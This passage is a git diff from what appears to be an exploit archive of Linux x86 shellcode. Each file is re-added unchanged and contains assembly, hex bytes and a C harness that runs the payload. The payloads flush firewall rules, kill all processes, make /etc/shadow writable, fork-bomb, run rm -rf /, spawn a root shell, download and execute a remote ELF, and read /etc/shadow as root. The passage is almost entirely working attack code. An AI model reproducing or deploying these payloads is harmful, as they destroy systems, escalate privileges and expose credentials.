byte 16 + movzx esi, si + add eax, esi + mov edx, eax + shr edx, byte 16 + add eax, edx + not ax + + ; set checksum + mov [ebp+22], word ax + + cdq + xor eax, eax + xor zero_reg, zero_reg + + ; struct sockaddr * + push zero_reg + push zero_reg + push dword [ebp+16] + push byte 2 + + ; sendto(sockfd, cmd, 255, 0, ...); + mov ecx, esp + push byte 16 + push ecx + push zero_reg + mov dl, byte 0ffh + push edx + push ebp + push sock_reg + mov ecx, esp + mov bl, 0bh + mov al, 66h + int 80h ; sendto(); + + cdq + mov ecx, ebp + mov ebx, zero_reg + mov al, 72h + int 80h ; wait(); + + jmp _while_loop + ; milw0rm.com [2007-04-02] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13344.c b/platforms/lin_x86/shellcode/13344.c index 3e97e4e9f..6aa0533fc 100755 --- a/platforms/lin_x86/shellcode/13344.c +++ b/platforms/lin_x86/shellcode/13344.c @@ -1,45 +1,45 @@ -/* By Kris Katterjohn 11/18/2006 - * - * 40 byte shellcode to flush iptables for Linux x86 - * - * - * - * section .text - * - * global _start - * - * _start: - * - * ; execve("/sbin/iptables", { "/sbin/iptables", "-F", NULL }, NULL) - * - * push byte 11 - * pop eax - * cdq - * push edx - * push word 0x462d - * mov ecx, esp - * push edx - * push word 0x7365 - * push 0x6c626174 - * push 0x70692f6e - * push 0x6962732f - * mov ebx, esp - * push edx - * push ecx - * push ebx - * mov ecx, esp - * int 0x80 - */ - -main() -{ - char shellcode[] = - "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89" - "\xe1\x52\x66\x68\x65\x73\x68\x74\x61\x62" - "\x6c\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62" - "\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* By Kris Katterjohn 11/18/2006 + * + * 40 byte shellcode to flush iptables for Linux x86 + * + * + * + * section .text + * + * global _start + * + * _start: + * + * ; execve("/sbin/iptables", { "/sbin/iptables", "-F", NULL }, NULL) + * + * push byte 11 + * pop eax + * cdq + * push edx + * push word 0x462d + * mov ecx, esp + * push edx + * push word 0x7365 + * push 0x6c626174 + * push 0x70692f6e + * push 0x6962732f + * mov ebx, esp + * push edx + * push ecx + * push ebx + * mov ecx, esp + * int 0x80 + */ + +main() +{ + char shellcode[] = + "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89" + "\xe1\x52\x66\x68\x65\x73\x68\x74\x61\x62" + "\x6c\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62" + "\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2007-03-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13345.c b/platforms/lin_x86/shellcode/13345.c index 3cb89e537..332c6f6fa 100755 --- a/platforms/lin_x86/shellcode/13345.c +++ b/platforms/lin_x86/shellcode/13345.c @@ -1,31 +1,31 @@ -/* By Kris Katterjohn 11/13/2006 - * - * 11 byte shellcode to kill all processes for Linux/x86 - * - * - * - * section .text - * - * global _start - * - * _start: - * - * ; kill(-1, SIGKILL) - * - * push byte 37 - * pop eax - * push byte -1 - * pop ebx - * push byte 9 - * pop ecx - * int 0x80 - */ - -main() -{ - char shellcode[] = "\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* By Kris Katterjohn 11/13/2006 + * + * 11 byte shellcode to kill all processes for Linux/x86 + * + * + * + * section .text + * + * global _start + * + * _start: + * + * ; kill(-1, SIGKILL) + * + * push byte 37 + * pop eax + * push byte -1 + * pop ebx + * push byte 9 + * pop ecx + * int 0x80 + */ + +main() +{ + char shellcode[] = "\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2007-03-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13346.s b/platforms/lin_x86/shellcode/13346.s index 6abfe7bd6..7cb7a0181 100755 --- a/platforms/lin_x86/shellcode/13346.s +++ b/platforms/lin_x86/shellcode/13346.s @@ -1,77 +1,77 @@ -# XCHG Research Group -# Linux/x86 execve read shellcode - 92 bytes -# -# -# )--[ Writed by 0ut0fbound ]--( -# -# - http://outofbound.host.sk -# - http://xchglabs.host.sk - -.text - - .globl _start - -_start: - -# EAX = 0x04 -> syscall write() - xorl %eax, %eax - movb $0x4, %al - xorl %ebx, %ebx - inc %ebx - pushl $0x20202020 - pushl $0x3a646e61 - pushl $0x6d6d6f43 - movl %esp, %ecx - xorl %edx, %edx - movb $0x9, %dl - int $0x80 - -# EAX = 0x03 -> syscall read() - xorl %eax, %eax - movb $0x3, %al - xorl %ebx, %ebx - xorl %edx, %edx - movb $0x20, %dl - subl %edx, %esp - movl %esp, %ecx - int $0x80 - -# buffer[read(0, buffer, sizeof(buffer))] = 0; - addl %eax, %ecx - dec %ecx - movl %ebx, (%ecx) - - movl %esp, %ebx - addl %eax, %ebx - movl %eax, %ecx - - xorl %edx, %edx - push %edx - -LOOP1: - movb (%ebx), %al - cmp $0x20, %al - jne CONT - xorb $0x20, (%ebx) - inc %ebx - pushl %ebx - dec %ebx -CONT: - dec %ebx -loop LOOP1 - - push %ebx - - movl %esp, %ecx - xorl %eax, %eax - movb $0xb, %al - - int $0x80 - -# EAX = 0x01 -> syscall exit - xorl %eax, %eax - inc %al - xorl %ebx, %ebx - int $0x80 - +# XCHG Research Group +# Linux/x86 execve read shellcode - 92 bytes +# +# +# )--[ Writed by 0ut0fbound ]--( +# +# - http://outofbound.host.sk +# - http://xchglabs.host.sk + +.text + + .globl _start + +_start: + +# EAX = 0x04 -> syscall write() + xorl %eax, %eax + movb $0x4, %al + xorl %ebx, %ebx + inc %ebx + pushl $0x20202020 + pushl $0x3a646e61 + pushl $0x6d6d6f43 + movl %esp, %ecx + xorl %edx, %edx + movb $0x9, %dl + int $0x80 + +# EAX = 0x03 -> syscall read() + xorl %eax, %eax + movb $0x3, %al + xorl %ebx, %ebx + xorl %edx, %edx + movb $0x20, %dl + subl %edx, %esp + movl %esp, %ecx + int $0x80 + +# buffer[read(0, buffer, sizeof(buffer))] = 0; + addl %eax, %ecx + dec %ecx + movl %ebx, (%ecx) + + movl %esp, %ebx + addl %eax, %ebx + movl %eax, %ecx + + xorl %edx, %edx + push %edx + +LOOP1: + movb (%ebx), %al + cmp $0x20, %al + jne CONT + xorb $0x20, (%ebx) + inc %ebx + pushl %ebx + dec %ebx +CONT: + dec %ebx +loop LOOP1 + + push %ebx + + movl %esp, %ecx + xorl %eax, %eax + movb $0xb, %al + + int $0x80 + +# EAX = 0x01 -> syscall exit + xorl %eax, %eax + inc %al + xorl %ebx, %ebx + int $0x80 + # milw0rm.com [2006-11-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13347.c b/platforms/lin_x86/shellcode/13347.c index df1ef0fbd..38411bb2d 100755 --- a/platforms/lin_x86/shellcode/13347.c +++ b/platforms/lin_x86/shellcode/13347.c @@ -1,45 +1,45 @@ -/* By Kris Katterjohn 11/18/2006 - * - * 40 byte shellcode to flush ipchains for Linux x86 - * - * - * - * section .text - * - * global _start - * - * _start: - * - * ; execve("/sbin/ipchains", { "/sbin/ipchains", "-F", NULL }, NULL) - * - * push byte 11 - * pop eax - * cdq - * push edx - * push word 0x462d - * mov ecx, esp - * push edx - * push word 0x736e - * push 0x69616863 - * push 0x70692f6e - * push 0x6962732f - * mov ebx, esp - * push edx - * push ecx - * push ebx - * mov ecx, esp - * int 0x80 - */ - -main() -{ - char shellcode[] = - "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89" - "\xe1\x52\x66\x68\x6e\x73\x68\x63\x68\x61" - "\x69\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62" - "\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* By Kris Katterjohn 11/18/2006 + * + * 40 byte shellcode to flush ipchains for Linux x86 + * + * + * + * section .text + * + * global _start + * + * _start: + * + * ; execve("/sbin/ipchains", { "/sbin/ipchains", "-F", NULL }, NULL) + * + * push byte 11 + * pop eax + * cdq + * push edx + * push word 0x462d + * mov ecx, esp + * push edx + * push word 0x736e + * push 0x69616863 + * push 0x70692f6e + * push 0x6962732f + * mov ebx, esp + * push edx + * push ecx + * push ebx + * mov ecx, esp + * int 0x80 + */ + +main() +{ + char shellcode[] = + "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89" + "\xe1\x52\x66\x68\x6e\x73\x68\x63\x68\x61" + "\x69\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62" + "\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2006-11-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13348.c b/platforms/lin_x86/shellcode/13348.c index 2713768f0..8d4a166d3 100755 --- a/platforms/lin_x86/shellcode/13348.c +++ b/platforms/lin_x86/shellcode/13348.c @@ -1,39 +1,39 @@ -/* By Kris Katterjohn 11/18/2006 - * - * 12 byte shellcode to set system time to 0 and exit. No real damage :) - * - * exit() code is the last 5 bytes (0x6a - 0x80) - * - * for Linux/x86 - * - * - * - * section .text - * - * global _start - * - * _start: - * - * ; stime([0]) - * - * push byte 25 - * pop eax - * cdq - * push edx - * mov ebx, esp - * int 0x80 - * - * ; exit() - * - * inc eax - * int 0x80 - */ - -main() -{ - char shellcode[] = "\x6a\x19\x58\x99\x52\x89\xe3\xcd\x80\x40\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* By Kris Katterjohn 11/18/2006 + * + * 12 byte shellcode to set system time to 0 and exit. No real damage :) + * + * exit() code is the last 5 bytes (0x6a - 0x80) + * + * for Linux/x86 + * + * + * + * section .text + * + * global _start + * + * _start: + * + * ; stime([0]) + * + * push byte 25 + * pop eax + * cdq + * push edx + * mov ebx, esp + * int 0x80 + * + * ; exit() + * + * inc eax + * int 0x80 + */ + +main() +{ + char shellcode[] = "\x6a\x19\x58\x99\x52\x89\xe3\xcd\x80\x40\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2006-11-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13350.c b/platforms/lin_x86/shellcode/13350.c index 72dfc18e8..715e59a9f 100755 --- a/platforms/lin_x86/shellcode/13350.c +++ b/platforms/lin_x86/shellcode/13350.c @@ -1,43 +1,43 @@ -/* By Kris Katterjohn 8/29/2006 - * - * 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86 - * - * To remove exit(): Remove the last 5 bytes (0x6a - 0x80) - * - * - * - * section .text - * - * global _start - * - * _start: - * xor edx, edx - * - * push byte 15 - * pop eax - * push edx - * push byte 0x77 - * push word 0x6f64 - * push 0x6168732f - * push 0x6374652f - * mov ebx, esp - * push word 0666Q - * pop ecx - * int 0x80 - * - * push byte 1 - * pop eax - * int 0x80 - */ - -main() -{ - char shellcode[] = - "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68" - "\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68" - "\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* By Kris Katterjohn 8/29/2006 + * + * 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86 + * + * To remove exit(): Remove the last 5 bytes (0x6a - 0x80) + * + * + * + * section .text + * + * global _start + * + * _start: + * xor edx, edx + * + * push byte 15 + * pop eax + * push edx + * push byte 0x77 + * push word 0x6f64 + * push 0x6168732f + * push 0x6374652f + * mov ebx, esp + * push word 0666Q + * pop ecx + * int 0x80 + * + * push byte 1 + * pop eax + * int 0x80 + */ + +main() +{ + char shellcode[] = + "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68" + "\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68" + "\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2006-11-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13351.c b/platforms/lin_x86/shellcode/13351.c index b8acad746..866d1dd7b 100755 --- a/platforms/lin_x86/shellcode/13351.c +++ b/platforms/lin_x86/shellcode/13351.c @@ -1,25 +1,25 @@ -/* By Kris Katterjohn 8/29/2006 - * - * 7 byte shellcode for a forkbomb - * - * - * - * section .text - * - * global _start - * - * _start: - * push byte 2 - * pop eax - * int 0x80 - * jmp short _start - */ - -main() -{ - char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9"; - - (*(void (*)()) shellcode)(); -} - +/* By Kris Katterjohn 8/29/2006 + * + * 7 byte shellcode for a forkbomb + * + * + * + * section .text + * + * global _start + * + * _start: + * push byte 2 + * pop eax + * int 0x80 + * jmp short _start + */ + +main() +{ + char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2006-11-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13352.c b/platforms/lin_x86/shellcode/13352.c index 1978606de..1be0821b4 100755 --- a/platforms/lin_x86/shellcode/13352.c +++ b/platforms/lin_x86/shellcode/13352.c @@ -1,50 +1,50 @@ -/* By Kris Katterjohn 11/18/2006 - * - * 45 byte shellcode to execve("rm -rf /") for Linux/x86 - * - * - * - * section .text - * - * global _start - * - * _start: - * - * ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL) - * - * push byte 11 - * pop eax - * cdq - * push edx - * push byte 0x2f - * mov edi, esp - * push edx - * push word 0x662d - * mov esi, esp - * push edx - * push word 0x722d - * mov ecx, esp - * push edx - * push 0x6d722f2f - * push 0x6e69622f - * mov ebx, esp - * push edx - * push edi - * push esi - * push ecx - * push ebx - * mov ecx, esp - * int 0x80 - */ - -main() -{ - char shellcode[] = - "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89" - "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68" - "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* By Kris Katterjohn 11/18/2006 + * + * 45 byte shellcode to execve("rm -rf /") for Linux/x86 + * + * + * + * section .text + * + * global _start + * + * _start: + * + * ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL) + * + * push byte 11 + * pop eax + * cdq + * push edx + * push byte 0x2f + * mov edi, esp + * push edx + * push word 0x662d + * mov esi, esp + * push edx + * push word 0x722d + * mov ecx, esp + * push edx + * push 0x6d722f2f + * push 0x6e69622f + * mov ebx, esp + * push edx + * push edi + * push esi + * push ecx + * push ebx + * mov ecx, esp + * int 0x80 + */ + +main() +{ + char shellcode[] = + "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89" + "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68" + "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2006-11-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13353.c b/platforms/lin_x86/shellcode/13353.c index 0b2712040..d50783b9a 100755 --- a/platforms/lin_x86/shellcode/13353.c +++ b/platforms/lin_x86/shellcode/13353.c @@ -1,44 +1,44 @@ -/* - * revenge-setuid.c, v1.0 2006/09/30 14:57 - * - * linux/x86 setuid(0) + execve("/bin//sh", ["/bin//sh"], NULL) shellcode - * once again... - * - * [ setuid (6 bytes) + execve (22 bytes) = 28 bytes ] - * [ ] - * [ Same as revenge-execve.c we start the 2 system ] - * [ calls with a mov resulting in 2 bytes less, but ] - * [ this one is only for suid binary exploitation. ] - * [ ] - * - * http://www.0xcafebabe.it - * - * - */ - -char sc[] = - // <_start> - "\xb0\x17" // mov $0x17,%al - "\x31\xdb" // xor %ebx,%ebx - "\xcd\x80" // int $0x80 - "\xb0\x0b" // mov $0xb,%al - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 -; - -int main() -{ - void (*fp)(void) = (void (*)(void))sc; - - printf("Length: %d\n",strlen(sc)); - fp(); -} - +/* + * revenge-setuid.c, v1.0 2006/09/30 14:57 + * + * linux/x86 setuid(0) + execve("/bin//sh", ["/bin//sh"], NULL) shellcode + * once again... + * + * [ setuid (6 bytes) + execve (22 bytes) = 28 bytes ] + * [ ] + * [ Same as revenge-execve.c we start the 2 system ] + * [ calls with a mov resulting in 2 bytes less, but ] + * [ this one is only for suid binary exploitation. ] + * [ ] + * + * http://www.0xcafebabe.it + * + * + */ + +char sc[] = + // <_start> + "\xb0\x17" // mov $0x17,%al + "\x31\xdb" // xor %ebx,%ebx + "\xcd\x80" // int $0x80 + "\xb0\x0b" // mov $0xb,%al + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 +; + +int main() +{ + void (*fp)(void) = (void (*)(void))sc; + + printf("Length: %d\n",strlen(sc)); + fp(); +} + // milw0rm.com [2006-11-16] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13354.c b/platforms/lin_x86/shellcode/13354.c index df622b3d2..bf54d52f8 100755 --- a/platforms/lin_x86/shellcode/13354.c +++ b/platforms/lin_x86/shellcode/13354.c @@ -1,41 +1,41 @@ -/* - * revenge-execve.c, v1.0 2006/10/14 16:32 - * - * Yet another linux execve shellcode.. - * linux/x86 execve("/bin//sh/",["/bin//sh"],NULL) shellcode - * - * http://www.0xcafebabe.it - * - * - * But this time it's 22 bytes - * - * [ We could start the shellcode with a mov instead of (push + pop) eax ] - * [ obtaining the same result with 1 byte less, but if we had something ] - * [ wrong in eax (ex. -1 due to an unclear function exit) we can't ] - * [ inject it ] - * - * */ - -char sc[] = - // <_start> - "\xb0\x0b" // mov $0xb,%al - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 -; - -int main() -{ - void (*fp)(void) = (void (*)(void))sc; - - printf("Length: %d\n",strlen(sc)); - fp(); -} - +/* + * revenge-execve.c, v1.0 2006/10/14 16:32 + * + * Yet another linux execve shellcode.. + * linux/x86 execve("/bin//sh/",["/bin//sh"],NULL) shellcode + * + * http://www.0xcafebabe.it + * + * + * But this time it's 22 bytes + * + * [ We could start the shellcode with a mov instead of (push + pop) eax ] + * [ obtaining the same result with 1 byte less, but if we had something ] + * [ wrong in eax (ex. -1 due to an unclear function exit) we can't ] + * [ inject it ] + * + * */ + +char sc[] = + // <_start> + "\xb0\x0b" // mov $0xb,%al + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 +; + +int main() +{ + void (*fp)(void) = (void (*)(void))sc; + + printf("Length: %d\n",strlen(sc)); + fp(); +} + // milw0rm.com [2006-11-16] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13355.c b/platforms/lin_x86/shellcode/13355.c index 2eec756a5..0bcc87648 100755 --- a/platforms/lin_x86/shellcode/13355.c +++ b/platforms/lin_x86/shellcode/13355.c @@ -1,128 +1,128 @@ -/* - * (linux/x86) - HTTP/1.x GET, Downloads and execve() - 111 bytes+ - * - * This shellcode allows you to download a ELF executable straight off a standard HTTP server - * and launch it. It will saved locally it into a filename called 'A' in the current directory. - * - * - * - * > The destination IP of the HTTP server is required (NO DNS!), use inet_addr() function result and - * modify the value in [1*] from 0xdeadbeef to the actual IP, if the IP contains NULLs then a little - * workaround requires. The simplest is to use ~inet_addr() followed by ``notl (%esp)`` to change back. - * - * > The destination port of the HTTP server is 80 by default, it is located within the 4 upper bytes - * of the value in [2*] (0xafff). Stored in an invert format (~), so if any further modification - * needed make sure to keep it stored in the same format. - * - * > The destination URL should be generated using the ``gen_httpreq`` utility. It will produce an - * assembly code which is a series of PUSH's and should be pasted as it is within in the marked place - * in the shellcode (look for the comment). - * - * : - * - * gen_httpreq.c, generates a HTTP GET request for this shellcode - * > http://www.tty64.org/code/shellcodes/utilities/gen_httpreq.c - * backup - * > http://www.milw0rm.com/shellcode/2618 - * - * - izik - */ - -char shellcode[] = - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x99" // cltd - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x5b" // pop %ebx - "\x5e" // pop %esi - "\x68\xef\xbe\xad\xde" // [1*] push $0xdeadbeef - "\xbd\xfd\xff\xff\xaf" // [2*] mov $0xaffffffd,%ebp - "\xf7\xd5" // not %ebp - "\x55" // push %ebp - "\x43" // inc %ebx - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\xb0\x66" // mov $0x66,%al - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x5f" // pop %edi - "\xb0\x08" // mov $0x8,%al - "\x52" // push %edx - "\x6a\x41" // push $0x41 - "\x89\xe3" // mov %esp,%ebx - "\x50" // push %eax - "\x59" // pop %ecx - "\xcd\x80" // int $0x80 - "\x96" // xchg %eax,%esi - "\x87\xdf" // xchg %ebx,%edi - - // - // - // - - "\xb0\x04" // mov $0x4,%al - - // - // <_send_http_request>: - // - - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x99" // cltd - "\x42" // inc %edx - - // - // <_wait_for_dbl_crlf>: - // - - "\x49" // dec %ecx - "\xb0\x03" // mov $0x3,%al - "\xcd\x80" // int $0x80 - "\x81\x39\x0a\x0d\x0a\x0d" // cmpl $0xd0a0d0a,(%ecx) - "\x75\xf3" // jne <_wait_for_dbl_crlf> - "\xb2\x04" // mov $0x4,%dl - - // - // <_dump_loop_do_read>: - // - - "\xb0\x03" // mov $0x3,%al - "\xf8" // clc - - - // - // <_dump_loop_do_write>: - // - - "\xcd\x80" // int $0x80 - "\x87\xde" // xchg %ebx,%esi - "\x72\xf7" // jb <_dump_loop_do_read> - "\x85\xc0" // test %eax,%eax - "\x74\x05" // je <_close_file> - "\xb0\x04" // mov $0x4,%al - "\xf9" // stc - "\xeb\xf1" // jmp <_dump_loop_do_write> - "\xb0\x06" // mov $0x6,%al - "\xcd\x80" // int $0x80 - "\x99" // cltd - "\xb0\x0b" // mov $0xb,%al - "\x89\xfb" // mov %edi,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\xeb\xcc"; // jmp <_send_http_request> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) - HTTP/1.x GET, Downloads and execve() - 111 bytes+ + * + * This shellcode allows you to download a ELF executable straight off a standard HTTP server + * and launch it. It will saved locally it into a filename called 'A' in the current directory. + * + * + * + * > The destination IP of the HTTP server is required (NO DNS!), use inet_addr() function result and + * modify the value in [1*] from 0xdeadbeef to the actual IP, if the IP contains NULLs then a little + * workaround requires. The simplest is to use ~inet_addr() followed by ``notl (%esp)`` to change back. + * + * > The destination port of the HTTP server is 80 by default, it is located within the 4 upper bytes + * of the value in [2*] (0xafff). Stored in an invert format (~), so if any further modification + * needed make sure to keep it stored in the same format. + * + * > The destination URL should be generated using the ``gen_httpreq`` utility. It will produce an + * assembly code which is a series of PUSH's and should be pasted as it is within in the marked place + * in the shellcode (look for the comment). + * + * : + * + * gen_httpreq.c, generates a HTTP GET request for this shellcode + * > http://www.tty64.org/code/shellcodes/utilities/gen_httpreq.c + * backup + * > http://www.milw0rm.com/shellcode/2618 + * + * - izik + */ + +char shellcode[] = + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x99" // cltd + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x5b" // pop %ebx + "\x5e" // pop %esi + "\x68\xef\xbe\xad\xde" // [1*] push $0xdeadbeef + "\xbd\xfd\xff\xff\xaf" // [2*] mov $0xaffffffd,%ebp + "\xf7\xd5" // not %ebp + "\x55" // push %ebp + "\x43" // inc %ebx + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\xb0\x66" // mov $0x66,%al + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x5f" // pop %edi + "\xb0\x08" // mov $0x8,%al + "\x52" // push %edx + "\x6a\x41" // push $0x41 + "\x89\xe3" // mov %esp,%ebx + "\x50" // push %eax + "\x59" // pop %ecx + "\xcd\x80" // int $0x80 + "\x96" // xchg %eax,%esi + "\x87\xdf" // xchg %ebx,%edi + + // + // + // + + "\xb0\x04" // mov $0x4,%al + + // + // <_send_http_request>: + // + + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x99" // cltd + "\x42" // inc %edx + + // + // <_wait_for_dbl_crlf>: + // + + "\x49" // dec %ecx + "\xb0\x03" // mov $0x3,%al + "\xcd\x80" // int $0x80 + "\x81\x39\x0a\x0d\x0a\x0d" // cmpl $0xd0a0d0a,(%ecx) + "\x75\xf3" // jne <_wait_for_dbl_crlf> + "\xb2\x04" // mov $0x4,%dl + + // + // <_dump_loop_do_read>: + // + + "\xb0\x03" // mov $0x3,%al + "\xf8" // clc + + + // + // <_dump_loop_do_write>: + // + + "\xcd\x80" // int $0x80 + "\x87\xde" // xchg %ebx,%esi + "\x72\xf7" // jb <_dump_loop_do_read> + "\x85\xc0" // test %eax,%eax + "\x74\x05" // je <_close_file> + "\xb0\x04" // mov $0x4,%al + "\xf9" // stc + "\xeb\xf1" // jmp <_dump_loop_do_write> + "\xb0\x06" // mov $0x6,%al + "\xcd\x80" // int $0x80 + "\x99" // cltd + "\xb0\x0b" // mov $0xb,%al + "\x89\xfb" // mov %edi,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\xeb\xcc"; // jmp <_send_http_request> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-10-22] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13356.c b/platforms/lin_x86/shellcode/13356.c index 679da38a4..e0f65b454 100755 --- a/platforms/lin_x86/shellcode/13356.c +++ b/platforms/lin_x86/shellcode/13356.c @@ -1,52 +1,52 @@ -/* - * bunker_exec.c V1.3 - Tue Mar 21 22:50:18 CET 2006 - * - * Linux/x86 bytecode that executes command after setreuid - * (9 + 40 bytes + cmd) - * - * setreuid(0, 0) + execve("/bin//sh", ["/bin//sh","-c","cmd"], NULL); - * - * "cmd" MUST be terminated with ";" (better with ";exit;" :-D) - * - * bunker - http://rawlab.mindcreations.com - * 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2 - * - * setreuid(0, 0); - * 00000000 6a46 push byte +0x46 - * 00000002 58 pop eax - * 00000003 31db xor ebx,ebx - * 00000005 31c9 xor ecx,ecx - * 00000007 cd80 int 0x80 - * - * execve("/bin//sh", ["/bin//sh", "-c", "cmd"], NULL); - * 00000009 eb21 jmp short 0x2c - * 0000000b 5f pop edi - * 0000000c 6a0b push byte +0xb - * 0000000e 58 pop eax - * 0000000f 99 cdq - * 00000010 52 push edx - * 00000011 66682d63 push word 0x632d - * 00000015 89e6 mov esi,esp - * 00000017 52 push edx - * 00000018 682f2f7368 push dword 0x68732f2f - * 0000001d 682f62696e push dword 0x6e69622f - * 00000022 89e3 mov ebx,esp - * 00000024 52 push edx - * 00000025 57 push edi - * 00000026 56 push esi - * 00000027 53 push ebx - * 00000028 89e1 mov ecx,esp - * 0000002a cd80 int 0x80 - * 0000002c e8daffffff call 0xb - * 00000031 .... "cmd; exit;" - */ - -char sc[]= -"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" -"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" -"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff" -"cat /etc/shadow; exit;"; - -main() { int(*f)()=(int(*)())sc;f(); } - +/* + * bunker_exec.c V1.3 - Tue Mar 21 22:50:18 CET 2006 + * + * Linux/x86 bytecode that executes command after setreuid + * (9 + 40 bytes + cmd) + * + * setreuid(0, 0) + execve("/bin//sh", ["/bin//sh","-c","cmd"], NULL); + 